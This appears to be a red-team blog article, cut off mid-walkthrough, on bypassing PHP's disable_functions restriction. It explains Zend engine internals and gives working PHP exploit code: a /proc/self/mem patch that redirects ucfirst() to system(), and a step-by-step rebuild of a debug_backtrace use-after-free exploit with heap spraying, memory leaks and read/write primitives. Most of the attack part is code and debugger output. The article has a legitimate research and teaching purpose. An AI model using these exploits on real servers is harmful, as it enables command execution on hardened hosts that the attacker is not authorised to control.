
When performing an intrusion test or a Red Team operation, multiple tools (webshells, SOCKS proxies to tunnel TCP traffic over HTTP and pivot, etc.) tend to be deployed on compromised web servers as custom scripts. In some cases these servers are hardened to a greater or lesser degree, which makes them somewhat difficult to compromise. One of the most common configurations found in PHP environments is the use of disable_functions to restrict which functions can be called from PHP scripts, blocking “dangerous” ones such as system(), passthru(), etc. In this article we will take an in-depth look at how this PHP directive works and how to circumvent it.

In summary, this article aims to shed light on the following topics:

  • Explanation of some PHP internals
  • Automation of the search for evasion techniques not based on memory corruption
  • Searching for vulnerabilities through fuzzing
  • Description of exploitation techniques

A gentle flight over PHP internals and disable_functions

Before we dive into explaining how to find vulnerabilities, and how to exploit them, first it is necessary to understand some basic concepts of how PHP works internally. In the following sections we will go deeper into certain topics, but for now let’s see how some key aspects work. First of all: functions.

In PHP we find 3 main types of functions: internal functions, which are the standard functions provided by PHP and its installed extensions (e.g. base64_decode()), and which are compiled; user-defined functions which are those created in the running script itself (e.g. function minorthreat() {...}); and finally, anonymous functions or closures, which are functions created in the script and which do not have a defined name (e.g. $name = function ($band) { printf ("Listen %s!\n", $band); }).

Internal functions are usually declared using macros such as PHP_FUNCTION, PHP_NAMED_FUNCTION, etc., and the parameters they receive are also defined with other macros: ZEND_PARSE_PARAMETERS_START and ZEND_PARSE_PARAMETERS_END. For example, the source code for base64_decode[1] is as follows:

PHP_FUNCTION(base64_decode)
{
    char *str;
    zend_bool strict = 0;
    size_t str_len;
    zend_string *result;

    /* One mandatory string argument, one optional boolean */
    ZEND_PARSE_PARAMETERS_START(1, 2)
        Z_PARAM_STRING(str, str_len)
        Z_PARAM_OPTIONAL
        Z_PARAM_BOOL(strict)
    ZEND_PARSE_PARAMETERS_END();

    result = php_base64_decode_ex((unsigned char*)str, str_len, strict);
    if (result != NULL) {
        RETURN_STR(result);
    } else {
        RETURN_FALSE;
    }
}

Looking at the source code, it can be seen how the parameters that this function receives are defined, in turn, by other macros depending on their type. In this case the function expects a mandatory string parameter and an optional boolean one. Once the code is compiled, these functions appear in the symbol table with the prefix zif_, which stands for “Zend Internal Function”:

ᐓ objdump -t /usr/local/bin/php | grep "zif_" | tail
0000000000f65e80 g F .text 00000000000023e3 zif_fgets
0000000000f6be70 g F .text 00000000000018c0 zif_fwrite
0000000000f69150 g F .text 0000000000001cca zif_fgetss
0000000000f7f5f0 g F .text 0000000000001564 zif_fread
00000000015a10c0 g F .text 0000000000000031 zif_display_disabled_function
0000000000f6e130 g F .text 00000000000009f3 zif_rewind
0000000000f6eb30 g F .text 0000000000000a3a zif_ftell
0000000000f6f570 g F .text 0000000000001428 zif_fseek
0000000000f35160 g F .text 0000000000000c4e zif_dl
0000000000f6d730 g F .text 00000000000009f5 zif_fflush

Internal functions are registered in the Zend engine using the zend_function_entry structure, which is defined as follows:

typedef struct _zend_function_entry {
const char *fname;
void (*handler)(INTERNAL_FUNCTION_PARAMETERS);
const struct _zend_internal_arg_info *arg_info;
uint32_t num_args;
uint32_t flags;
} zend_function_entry;

The first two members stand out in this structure, as they hold the function name and its handler (that is, for a hypothetical function str(), the first member would point to the string “str” and the second one to the zif_str function). The “basic” functions are grouped for registration into basic_functions, an array of zend_function_entry structures[2]. Therefore, basic_functions ultimately gives us an ordered list of function names paired with pointers to their handlers.

Both internal and user-defined functions are registered into the Zend engine using a HashTable called function_table. Whenever a PHP script makes a function call, the handler of the function is searched for in this HashTable. This is where the disable_functions directive will act.

For every function listed in the directive, the engine calls zend_disable_function on the corresponding entry of the function_table:

ZEND_API int zend_disable_function(char *function_name, size_t function_name_length)
{
zend_internal_function *func;
if ((func = zend_hash_str_find_ptr(CG(function_table), function_name, function_name_length))) {
zend_free_internal_arg_info(func);
func->fn_flags &= ~(ZEND_ACC_VARIADIC | ZEND_ACC_HAS_TYPE_HINTS | ZEND_ACC_HAS_RETURN_TYPE);
func->num_args = 0;
func->arg_info = NULL;
func->handler = ZEND_FN(display_disabled_function);
return SUCCESS;
}
return FAILURE;
}

As can be seen in the code, zend_disable_function searches the HashTable for the target function and changes the original handler to the display_disabled_function:

ZEND_API ZEND_COLD ZEND_FUNCTION(display_disabled_function)
{
zend_error(E_WARNING, "%s() has been disabled for security reasons", get_active_function_name());
}

Therefore, when a disabled function is called from a PHP script, instead of the original function being executed, the function showing the error message will be executed. That is, disable_functions only affects the function_table: if the original handler is found, its effect can be reversed by patching the function_table or by calling the function directly. We will dive into these concepts in more detail below.
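
The idea can be modelled outside PHP with a deliberately simplified sketch. The Python snippet below is only a toy: the dictionary stands in for the function_table, the callables stand in for the zif_ handlers, and every name in it is illustrative rather than part of the Zend engine. It shows that disabling a function only rewrites a table entry, so re-pointing any other entry at the untouched original handler undoes the restriction.

```python
# Toy model of the Zend function_table: function names mapped to handlers.
# All names here are illustrative stand-ins, not real Zend symbols.

def zif_system(cmd):
    # Stand-in for the real handler; it only reports what it would run.
    return f"[would run: {cmd}]"

def zif_ucfirst(s):
    return s[:1].upper() + s[1:]

def display_disabled_function(*_args):
    return "Warning: function has been disabled for security reasons"

function_table = {"system": zif_system, "ucfirst": zif_ucfirst}

def disable_function(name):
    """Mimics zend_disable_function: only the table entry is rewritten."""
    if name in function_table:
        function_table[name] = display_disabled_function
        return True
    return False

disable_function("system")
blocked = function_table["system"]("id")

# The original handler still exists in memory; pointing another entry at it
# is enough to reach it again.
function_table["ucfirst"] = zif_system
bypassed = function_table["ucfirst"]("id")

print(blocked)
print(bypassed)
```

In the real engine the table lives in the heap and the handlers in the binary's code, which is why the rest of the article is about finding both addresses.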

Learning by practice: sparring with php-cli and selfpatching /proc/self/mem

To put the concepts from the previous section together, with the aim of exploiting vulnerabilities later on, let’s see how to work with process memory to evade disable_functions. When developing a real exploit, every step we take here has to be carried out with arbitrary read and write primitives (for example, heap or binary addresses have to be leaked). It goes without saying that this technique should not work against any modern web server (although it is true that it has been used in the past[3]), so php-cli is just our sparring partner before jumping into a real exploit. If at the end of this section you have understood everything, you are on the right path.

Note: for this section we are using PHP 7.3 installed on Debian 10 using apt-get install (PHP 7.3.14-1~deb10u1 (cli) (built: Feb 16 2020 15:07:23) ( NTS ))

Our road map is quite simple:

  1. Locate the addresses where the binary and heap sections are mapped.
  2. Find handlers in the code for zif_system and another function that receives a string parameter (such as zif_ucfirst).
  3. Locate the function_table in the heap and replace the function handler in the entry for ucfirst() with the one of zif_system.
  4. Call ucfirst() using a system command as parameter (as you would do with system()).

For the first step we can directly parse the entries at /proc/self/maps (in the next section we will see how this information would be obtained in a real exploit). A rough approximation could be the following:

function memmaps() {
print "[+] Parsing mapped memory regions:\n";
$targets = Array();
$raw_map = explode(PHP_EOL,file_get_contents("/proc/self/maps"));
$check = 0;
foreach ($raw_map as $line) {
if (substr($line,-7) == "/php7.3" && $check == 0) {
if (strpos($line, "r--p") !== false) {
$range = explode(" ", $line);
$split_range = explode("-", $range[0]);
$targets["bin_start"] = hexdec($split_range[0]);
$targets["bin_end"] = hexdec($split_range[1]);
$check = 1;
}
}
if (substr($line, -6) == "[heap]") {
$range = explode(" ", $line);
$split_range = explode("-", $range[0]);
$targets["heap_start"] = hexdec($split_range[0]);
$targets["heap_end"] = hexdec($split_range[1]);
}
}
print "\t[-] Binary: 0x" . dechex($targets["bin_start"]) . "-0x" . dechex($targets["bin_end"]) . "\n";
print "\t[-] Heap: 0x" . dechex($targets["heap_start"]) . "-0x" . dechex($targets["heap_end"]) . "\n";
return $targets;
}
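
The parsing logic is easier to test when it is separated from the live process. The following Python sketch applies the same selection rules (first r--p mapping of the interpreter binary, plus the [heap] line) to a sample text. The sample reuses the address ranges printed later in this section, but the remaining columns (offsets, device, inode, path prefix) and the second line are made up for illustration.

```python
def parse_maps(text, binary_suffix):
    """Pick the first r--p mapping of the binary and the [heap] mapping."""
    targets = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 2:
            continue
        start, end = (int(part, 16) for part in fields[0].split("-"))
        perms = fields[1]
        path = fields[5] if len(fields) > 5 else ""
        if (path.endswith(binary_suffix) and perms == "r--p"
                and "bin_start" not in targets):
            targets["bin_start"], targets["bin_end"] = start, end
        elif path == "[heap]":
            targets["heap_start"], targets["heap_end"] = start, end
    return targets

# Hypothetical /proc/self/maps excerpt (only the address ranges of the first
# and last line come from the PoC output shown in this article).
SAMPLE = """\
563eafc2e000-563eafd08000 r--p 00000000 08:01 1234 /usr/bin/php7.3
563eafd08000-563eaff00000 r-xp 000da000 08:01 1234 /usr/bin/php7.3
563eb1123000-563eb12a3000 rw-p 00000000 00:00 0 [heap]
"""

targets = parse_maps(SAMPLE, "/php7.3")
for key, value in targets.items():
    print(f"{key}: 0x{value:x}")
```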

We will also need a couple of auxiliary functions to work with “raw” process memory. We will use a combination of fseek() and fread() to perform arbitrary reads at the desired memory addresses:

function getdata($fd, $address, $size) {
fseek($fd, $address);
$data = fread($fd, $size);
return $data;
}
function trans1($value) {
return hexdec(bin2hex(strrev($value)));
}
function trans2($value) {
return strrev(hex2bin(dechex($value)));
}
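
For reference, trans1() and trans2() are just little-endian conversions between raw bytes and integers. A minimal Python equivalent is sketched below, with helper names of our own choosing. Unlike the dechex()-based PHP helper, which emits only as many bytes as the value needs and relies on the hex string having an even number of digits, this version always produces a fixed width.

```python
def le_to_int(raw: bytes) -> int:
    """Counterpart of trans1(): little-endian bytes to integer."""
    return int.from_bytes(raw, "little")

def int_to_le(value: int, width: int = 8) -> bytes:
    """Counterpart of trans2(), padded to a fixed width (8 bytes by default)."""
    return value.to_bytes(width, "little")

addr = 0x563eafe15b50          # zif_system address from the PoC output
raw = int_to_le(addr)
print(raw.hex())
print(hex(le_to_int(raw)))
```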

Having extracted the base address (using our previously declared memmaps()), the ELF header can be parsed to obtain the memory range in which to look for the basic_functions array:

function parse_elf($base) { // https://wiki.osdev.org/ELF_Tutorial
$parsed = Array();
$fd = fopen("/proc/self/mem", "rb");
$parsed["type"] = getdata($fd, $base + 0x10, 1);
$parsed["phoff"] = getdata($fd, $base + 0x20, 8);
$parsed["phentsize"] = getdata($fd, $base + 0x36, 2);
$parsed["phnum"] = getdata($fd, $base + 0x38, 2);
for ($i = 0; $i < trans1($parsed["phnum"]); $i++) {
$header = $base + trans1($parsed["phoff"]) + $i * trans1($parsed["phentsize"]);
$parsed["ptype"] = getdata($fd, $header, 4);
$parsed["pflags"] = getdata($fd, $header + 0x4, 4);
$parsed["pvaddr"] = getdata($fd, $header + 0x10, 8);
$parsed["pmemsz"] = getdata($fd, $header + 0x28, 8);
if (trans1($parsed["ptype"]) == 1 && trans1($parsed["pflags"]) == 6) {
$parsed["data_addr"] = trans1($parsed["type"]) == 2 ? trans1($parsed["pvaddr"]) : $base + trans1($parsed["pvaddr"]);
$parsed["data_size"] = trans1($parsed["pmemsz"]);
} else if (trans1($parsed["ptype"]) == 1 && trans1($parsed["pflags"]) == 5) {
$parsed["text_size"] = trans1($parsed["pmemsz"]);
}
}
return $parsed;
}
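
The offsets used above come straight from the ELF64 layout: e_type at 0x10, e_phoff at 0x20, e_phentsize at 0x36 and e_phnum at 0x38 in the file header, and p_type, p_flags, p_vaddr and p_memsz at 0x0, 0x4, 0x10 and 0x28 in each program header. As a sanity check, here is a sketch in Python that runs the same logic over a synthetic image built in memory. The image, the base address and the segment sizes are invented for the example.

```python
import struct

PT_LOAD = 1
PF_X, PF_W, PF_R = 1, 2, 4
ET_EXEC = 2

def parse_elf64(image: bytes, base: int) -> dict:
    """Locate the RW (data) segment and the size of the RX (text) segment."""
    (e_type,) = struct.unpack_from("<H", image, 0x10)
    (e_phoff,) = struct.unpack_from("<Q", image, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", image, 0x36)
    out = {}
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, p_flags = struct.unpack_from("<II", image, off)
        (p_vaddr,) = struct.unpack_from("<Q", image, off + 0x10)
        (p_memsz,) = struct.unpack_from("<Q", image, off + 0x28)
        if p_type != PT_LOAD:
            continue
        if p_flags == PF_R | PF_W:
            # Non-PIE binaries hold absolute addresses; PIE ones are relative
            out["data_addr"] = p_vaddr if e_type == ET_EXEC else base + p_vaddr
            out["data_size"] = p_memsz
        elif p_flags == PF_R | PF_X:
            out["text_size"] = p_memsz
    return out

def fake_phdr(p_type, p_flags, p_vaddr, p_memsz):
    # Elf64_Phdr: type, flags, offset, vaddr, paddr, filesz, memsz, align
    return struct.pack("<IIQQQQQQ", p_type, p_flags, 0,
                       p_vaddr, p_vaddr, p_memsz, p_memsz, 0x1000)

header = bytearray(64)                        # Elf64_Ehdr is 64 bytes long
header[0:4] = b"\x7fELF"
struct.pack_into("<H", header, 0x10, 3)       # e_type = ET_DYN (PIE)
struct.pack_into("<Q", header, 0x20, 64)      # e_phoff: right after the header
struct.pack_into("<HH", header, 0x36, 56, 2)  # e_phentsize, e_phnum
image = (bytes(header)
         + fake_phdr(PT_LOAD, PF_R | PF_X, 0x1000, 0x2000)
         + fake_phdr(PT_LOAD, PF_R | PF_W, 0x4000, 0x800))

info = parse_elf64(image, base=0x555555554000)
print({key: hex(value) for key, value in info.items()})
```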

In the previous section we saw that this array is composed of zend_function_entry structures, and that the first two members are pointers to the function name and handler. Therefore, if we want to locate the pointers to zif_ucfirst and zif_system, we can sequentially extract 8-byte blocks and use these values as addresses to read 8 bytes from (in case they are valid memory addresses). If these bytes correspond to the function name, it will mean that the position where that memory address was found corresponds to the *fname field of the zend_function_entry structure, and therefore the field containing the target handler will be 8 bytes later.

Looking for handlers

This same procedure would be used to locate the entry of the function escapeshellcmd() (our zif_system is at a distance of 0x20 from it[4]):

function get_handlers($base, $data_addr, $text_size, $data_size) {
print "[+] Searching for handlers in basic_functions:\n";
$handlers = Array();
$fd = fopen("/proc/self/mem", "rb");
for ($i = 0; $i < $data_size / 8; $i++) {
$test = trans1(getdata($fd, $data_addr + $i * 0x8, 8));
if ($test - $base > 0 && $test - $base < $data_addr - $base) {
$fname = getdata($fd, $test, 8);
if (trans1($fname) == 0x74737269666375) { // ucfirst() ==> python -c 'a = "ucfirst"; print "0x" + a[::-1].encode("hex")'
$handlers["ucfirst"] = trans1(getdata($fd, $data_addr + $i * 0x8 + 8, 8));
print "\t[-] zif_ucfirst found at 0x" . dechex($handlers["ucfirst"]) . "\n";
continue;
} else if (trans1($fname) == 0x6873657061637365) { // escapeshellcmd() ==> python -c 'a = "escapesh"; print "0x" + a[::-1].encode("hex")'
$handlers["system"] = trans1(getdata($fd, $data_addr + $i * 0x8 + 8 - 0x20, 8));
print "\t[-] zif_system found at 0x" . dechex($handlers["system"]) . "\n";
return $handlers;
}
}
}
}
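
The magic constants compared against $fname are simply the first bytes of each function name read as a little-endian integer. The one-liners in the comments above are written for Python 2; an equivalent for Python 3 could look like the sketch below (the helper name is ours).

```python
def name_to_qword(name: str) -> int:
    """First 8 bytes (at most) of a name, read as a little-endian integer."""
    return int.from_bytes(name.encode("ascii")[:8], "little")

for name in ("ucfirst", "escapeshellcmd", "system"):
    print(f"{name:<15} 0x{name_to_qword(name):x}")
```

Names shorter than 8 bytes, such as ucfirst, match an 8-byte read only because the terminating NUL byte supplies the missing high-order zero byte.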

At this point we know the location of zif_ucfirst, so all that remains is to scan the heap for this address (it will be found in the function_table) and replace it with zif_system:

function scan_and_patch($base, $final, $old, $new) {
print "[+] Scanning the heap to locate the function_table\n";
$fd = fopen("/proc/self/mem", "r+b");
for ($i = 0; $i < ($final - $base) / 8; $i++) {
$test = trans1(getdata($fd, $base + $i * 0x8, 8));
if ($test == $old) {
print "\t[-] zif_ucfirst referenced at 0x" . dechex($base + $i * 0x8) ."\n";
fseek($fd, $base + $i * 0x8);
print "[+] Patching ucfirst() with zif_system handler\n";
fwrite($fd,trans2($new));
return;
}
}
}

After modifying the function_table in this way, when calling ucfirst(), system() will actually be invoked.

ᐓ php7.3 -d "disable_functions=system" disable_functions_PoC.php
-=[ Bypassing disable_functions when open_basedir is misconfigured (PoC by @TheXC3LL) ]=-
[+] Parsing mapped memory regions:
[-] Binary: 0x563eafc2e000-0x563eafd08000
[-] Heap: 0x563eb1123000-0x563eb12a3000
[+] Searching for handlers in basic_functions:
[-] zif_ucfirst found at 0x563eafe44220
[-] zif_system found at 0x563eafe15b50
[+] Scanning the heap to locate the function_table
[-] zif_ucfirst referenced at 0x563eb1173c70
[+] Patching ucfirst() with zif_system handler
[+] Calling ucfirst('uname -a')...
Linux insulaservus 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux

If all the concepts explained so far are clear, we can start battling with real vulnerabilities to create our exploits.

A flyweight combat: debug_backtrace() exploit (UAF)

Each vulnerability has its own peculiarities, and its exploitation can differ greatly from one to another. Likewise, the difficulty and the problems to be solved are different in each case. In this section we are going to analyze and exploit a fairly simple vulnerability, one that will nevertheless allow us to put into practice the concepts seen in previous sections. We will analyze and rebuild mm0r1’s use-after-free exploit for debug_backtrace()[5].

Note: in this section we will use PHP 7.2.11 compiled with symbols and without optimizations. PHP 7.2.11 (cli) (built: Mar 4 2020 15:11:35) ( NTS )

./configure CFLAGS="-O0 -g"
make -j$(nproc)
sudo make install

The script exploits a vulnerability reported years ago[6]. A small example in the bugtracker thread triggers the problem:

<?php
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace();
}
}
function trigger_uaf($arg) {
$arg = str_shuffle(str_repeat('A', 79));
$vuln = new Vuln();
$vuln->a = $arg;
}
trigger_uaf('x');
?>

We can identify the existence of a use-after-free (UAF) using valgrind[7] (run export USE_ZEND_ALLOC=0 prior to it):

==60628== Invalid write of size 4
==60628== at 0x788F78: zval_addref_p (zend_types.h:892)
==60628== by 0x788F78: debug_backtrace_get_args (zend_builtin_functions.c:2157)
==60628== by 0x78A6AF: zend_fetch_debug_backtrace (zend_builtin_functions.c:2550)
==60628== by 0x792478: zend_default_exception_new_ex (zend_exceptions.c:216)
==60628== by 0x7927E0: zend_default_exception_new (zend_exceptions.c:244)
==60628== by 0x7566CE: _object_and_properties_init (zend_API.c:1332)
==60628== by 0x756712: _object_init_ex (zend_API.c:1340)
==60628== by 0x7F4D9E: ZEND_NEW_SPEC_CONST_HANDLER (zend_vm_execute.h:3231)
==60628== by 0x8EEEFB: execute_ex (zend_vm_execute.h:59945)
==60628== by 0x72F9A4: zend_call_function (zend_execute_API.c:820)
==60628== by 0x78FA01: zend_call_method (zend_interfaces.c:100)
==60628== by 0x7C4140: zend_objects_destroy_object (zend_objects.c:146)
==60628== by 0x7CD40D: zend_objects_store_del (zend_objects_API.c:173)
==60628== Address 0x737adc0 is 0 bytes inside a block of size 104 free'd
==60628== at 0x48369AB: free (vg_replace_malloc.c:530)
==60628== by 0x70A0AE: _efree (zend_alloc.c:2444)
==60628== by 0x74AEB5: zend_string_free (zend_string.h:283)
==60628== by 0x74AEB5: _zval_dtor_func (zend_variables.c:38)
==60628== by 0x72DAD6: i_zval_ptr_dtor (zend_variables.h:49)
==60628== by 0x72DAD6: _zval_ptr_dtor (zend_execute_API.c:533)
==60628== by 0x7C9D8C: zend_std_unset_property (zend_object_handlers.c:976)
==60628== by 0x86B3D6: ZEND_UNSET_OBJ_SPEC_UNUSED_CONST_HANDLER (zend_vm_execute.h:28570)
==60628== by 0x8F5B05: execute_ex (zend_vm_execute.h:61688)
==60628== by 0x72F9A4: zend_call_function (zend_execute_API.c:820)
==60628== by 0x78FA01: zend_call_method (zend_interfaces.c:100)
==60628== by 0x7C4140: zend_objects_destroy_object (zend_objects.c:146)
==60628== by 0x7CD40D: zend_objects_store_del (zend_objects_API.c:173)
==60628== by 0x74AF10: _zval_dtor_func (zend_variables.c:56)
==60628== Block was alloc'd at
==60628== at 0x483577F: malloc (vg_replace_malloc.c:299)
==60628== by 0x70AF88: __zend_malloc (zend_alloc.c:2829)
==60628== by 0x709E47: _emalloc (zend_alloc.c:2429)
==60628== by 0x62ABAC: zend_string_alloc (zend_string.h:134)
==60628== by 0x62ABAC: zend_string_init (zend_string.h:170)
==60628== by 0x62ABAC: zif_str_shuffle (string.c:5489)
==60628== by 0x8E91EE: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:617)
==60628== by 0x8E91EE: execute_ex (zend_vm_execute.h:59750)
==60628== by 0x900092: zend_execute (zend_vm_execute.h:63776)
==60628== by 0x750AE8: zend_execute_scripts (zend.c:1496)
==60628== by 0x69FC9C: php_execute_script (main.c:2590)
==60628== by 0x903608: do_cli (php_cli.c:1011)
==60628== by 0x9047D8: main (php_cli.c:1404)

Confirming the exploitability of this vulnerability is trivial:

<?php
function pwn() {
global $canary, $backtrace;
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace();
}
}
function trigger_uaf($arg) {
$arg = str_shuffle(str_repeat('A', 60));
$vuln = new Vuln();
$vuln->a = $arg;
}
$n_alloc = 10; // number of spray allocations; increase this value if the UAF fails
$contiguous = [];
for ($i = 0; $i < $n_alloc; $i++) {
$contiguous[] = str_shuffle(str_repeat('A', 60));
}
trigger_uaf('x');
$canary = $backtrace[1]['args'][0];
$dummy = str_shuffle(str_repeat('B', 60));
print $canary; // It will print BBB...BBBB
}
pwn();
?>

In the previous example, printing the variable $canary actually showed the content of $dummy. If, instead of a string, we use an object to fill the gap left behind, we should be able to see its representation in memory:

<?php
function pwn() {
global $canary, $backtrace, $helper;
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace();
}
}
function trigger_uaf($arg) {
$arg = str_shuffle(str_repeat('A', 79));
$vuln = new Vuln();
$vuln->a = $arg;
}
class Helper {
public $a;
}
$n_alloc = 10; // number of spray allocations; increase this value if the UAF fails
$contiguous = [];
for ($i = 0; $i < $n_alloc; $i++) {
$contiguous[] = str_shuffle(str_repeat('A', 79));
}
trigger_uaf('x');
$canary = $backtrace[1]['args'][0];
$helper = new Helper;
$helper->a = function ($x) {};
print $canary;
}
pwn();
?>

However, we see a regular string:

ᐓ /usr/local/bin/php uaf.php
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

If instead of using print we use debug_zval_dump, we can see how the refcount field holds a wrong value:

ᐓ /usr/local/bin/php uaf.php
string(79) "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" refcount(3979578963)

In PHP 7 strings are represented using the structure zend_string[8]. This structure stores the characters inline as a char array rather than through a pointer[9]:

struct _zend_string {
zend_refcounted_h gc;
zend_ulong h;
size_t len;
char val[1]; // NOT A "char *"
};

In turn, variables in the Zend engine are called ‘zval’, and their value is contained in the following structure[10]:

typedef union _zend_value {
zend_long lval;
double dval;
zend_refcounted *counted;
zend_string *str;
zend_array *arr;
zend_object *obj;
zend_resource *res;
zend_reference *ref;
zend_ast_ref *ast;
zval *zv;
void *ptr;
zend_class_entry *ce;
zend_function *func;
struct {
uint32_t w1;
uint32_t w2;
} ww;
} zend_value;

Knowing all this information, and fixing the object sizes (number of properties), we can get leaked memory in a string:

<?php
function pwn() {
global $canary, $backtrace, $helper;
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace();
}
}
function trigger_uaf($arg) {
$arg = str_shuffle(str_repeat('A', 79));
$vuln = new Vuln();
$vuln->a = $arg;
}
class Helper {
public $a, $b, $c, $d;
}
$n_alloc = 10; // number of spray allocations; increase this value if the UAF fails
$contiguous = [];
for ($i = 0; $i < $n_alloc; $i++) {
$contiguous[] = str_shuffle(str_repeat('A', 79));
}
trigger_uaf('x');
$canary = $backtrace[1]['args'][0];
$helper = new Helper;
$helper->b = function ($x) {};
$address = $canary[0].$canary[1].$canary[2].$canary[3].$canary[4].$canary[5].$canary[6].$canary[7];
print "0x" . bin2hex(strrev($address));
var_dump();
}
pwn();
?>

We execute:

ᐓ /usr/local/bin/php uaf.php
0x00005555564ac2a0

And we can check that this value corresponds to the memory address of std_object_handlers[12]:

pwndbg> x/x 0x00005555564ac2a0
0x5555564ac2a0 <std_object_handlers>: 0x00000000

Right now we have relative read and write primitives (by treating $canary as a string we can access individual bytes with $canary[x], as if it were an array), and we need to achieve an absolute arbitrary read (that is, being able to read the content of any valid memory address). We can use one of the $helper object properties for this. Let’s put a breakpoint in var_dump() and proceed with the following example:

<?php
function pwn() {
global $canary, $backtrace, $helper;
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace();
}
}
function trigger_uaf($arg) {
$arg = str_shuffle(str_repeat('A', 79));
$vuln = new Vuln();
$vuln->a = $arg;
}
class Helper {
public $a, $b, $c, $d;
}
$n_alloc = 10; // number of spray allocations; increase this value if the UAF fails
$contiguous = [];
for ($i = 0; $i < $n_alloc; $i++) {
$contiguous[] = str_shuffle(str_repeat('A', 79));
}
trigger_uaf('x');
$canary = $backtrace[1]['args'][0];
$helper = new Helper;
$helper->b = function ($x) {};
$helper->a = "KKKK";
var_dump($helper->a);
}
pwn();
?>

Inspecting the memory, we get the following:

pwndbg> x/g args
0x555556637fb8: 0x0000555556638d00
pwndbg> x/40x 0x0000555556638d00
0x555556638d00: 0xc001800800000001 0x0000000000000001
0x555556638d10: 0x00005555566169f0 0x00005555564ac2a0
0x555556638d20: 0x0000000000000000 0x0000555556635d10 <--- Pointer to zend_string
0x555556638d30: 0x4141414100000006 0x000055555660c490
0x555556638d40: 0x4141414100000408 0x0000000000000020
0x555556638d50: 0x4141414100000001 0x0000000000000020
0x555556638d60: 0x0041414100000001 0x0000000000000021
0x555556638d70: 0x0000555556616fe8 0x0000000000000000
0x555556638d80: 0x0000000000000000 0x0000000000000021
0x555556638d90: 0x00000008000000c0 0x00007fff0000000c
0x555556638da0: 0x0000000000000000 0x0000000000000041
0x555556638db0: 0x0000800700000002 0xfffffffe00000012
0x555556638dc0: 0x00005555563582c0 0x0000000000000000
0x555556638dd0: 0xffffffff00000008 0x0000000000000000
0x555556638de0: 0x0000555555b79a7d 0x0000000000000031
0x555556638df0: 0x0000000000000000 0x00005555564e2010
0x555556638e00: 0x0000000000000006 0x00007265706c6568
0x555556638e10: 0x0000000000000000 0x0000000000000021
0x555556638e20: 0x00007fff00000002 0x00007ffff7c05ca0
0x555556638e30: 0x0000000000000000 0x0000000000000051

We can see that 0x0000555556635d10 is the pointer to the zend_string structure containing the “KKKK” string:

pwndbg> x/4g 0x0000555556635d10
0x555556635d10: 0x0000020600000000 0x800000017c8778f1
0x555556635d20: 0x0000000000000004 0x000000004b4b4b4b <-- "KKKK"

Or, inspecting it as a structure:

pwndbg> print (zend_string) *0x0000555556635d10
$42 = {
gc = {
refcount = 0,
u = {
v = {
type = 6 '\006',
flags = 2 '\002',
gc_info = 0
},
type_info = 518
}
},
h = 9223372043238996209,
len = 4,
val = "K"
}

If, with our relative writing, we change the zend_string structure pointer so that it points to a different valid memory address, we will be able to leak its contents. Let’s try changing that pointer to one taken from the debugger for testing:

<?php
function pwn() {
global $canary, $backtrace, $helper;
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace();
}
}
function trigger_uaf($arg) {
$arg = str_shuffle(str_repeat('A', 79));
$vuln = new Vuln();
$vuln->a = $arg;
}
class Helper {
public $a, $b, $c, $d;
}
function str2ptr(&$str, $p = 0, $s = 8) {
$address = 0;
for ($j = $s-1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($str[$p+$j]);
}
return $address;
}
function write(&$str, $p, $v, $n = 8) {
$i = 0;
for ($i = 0; $i < $n; $i++) {
$str[$p + $i] = chr($v & 0xff);
$v >>= 8;
}
}
$n_alloc = 10; // number of spray allocations; increase this value if the UAF fails
$contiguous = [];
for ($i = 0; $i < $n_alloc; $i++) {
$contiguous[] = str_shuffle(str_repeat('A', 79));
}
trigger_uaf('x');
$canary = $backtrace[1]['args'][0];
$helper = new Helper;
$helper->b = function ($x) {};
$php_heap = str2ptr($canary, 0x58);
$canary_addr = $php_heap - 0xc8;
write($canary, 0x60, 2);
write($canary, 0x70, 6);
write($canary, 0x10, hexdec("555556616f80")); // Random valid address to use as test
write($canary, 0x18, 0xa);
var_dump($helper->a);
}
pwn();
?>

Indeed, it now points to the address we have indicated:

pwndbg> x/40x 0x0000555556638e20
0x555556638e20: 0xc001800800000001 0x0000000000000000
0x555556638e30: 0x00005555566169f0 0x00005555564ac2a0
0x555556638e40: 0x0000000000000000 0x0000555556616f80 <-- Pointer used as test
0x555556638e50: 0x000000000000000a 0x00005555566364e0
0x555556638e60: 0x4141414100000408 0x0000000000000020
0x555556638e70: 0x4141414100000001 0x0000000000000020
0x555556638e80: 0x0041414100000001 0x0000000000000021
0x555556638e90: 0x0000555556616fe8 0x0000000000000002
0x555556638ea0: 0x0000000000000000 0x0000000000000006
0x555556638eb0: 0x00000008000000c0 0x00007fff0000000c
0x555556638ec0: 0x0000000000000000 0x0000000000000041
0x555556638ed0: 0x0000800700000002 0xfffffffe00000012
0x555556638ee0: 0x00005555563582c0 0x0000000000000000
0x555556638ef0: 0xffffffff00000008 0x0000000000000000
0x555556638f00: 0x0000555555b79a7d 0x0000000000000031
0x555556638f10: 0x0000000000000000 0x00005555564e2010
0x555556638f20: 0x0000000000000006 0x00007265706c6568
0x555556638f30: 0x0000000000000000 0x0000000000000021
0x555556638f40: 0x00007fff00000002 0x00007ffff7c05ca0
0x555556638f50: 0x0000000000000000 0x0000000000000051

As it is being interpreted as a zend_string, this memory area will leak information. We can, for example, call strlen($helper->a), which simply returns the len field of the fake structure:

pwndbg> x/4g 0x0000555556616f80
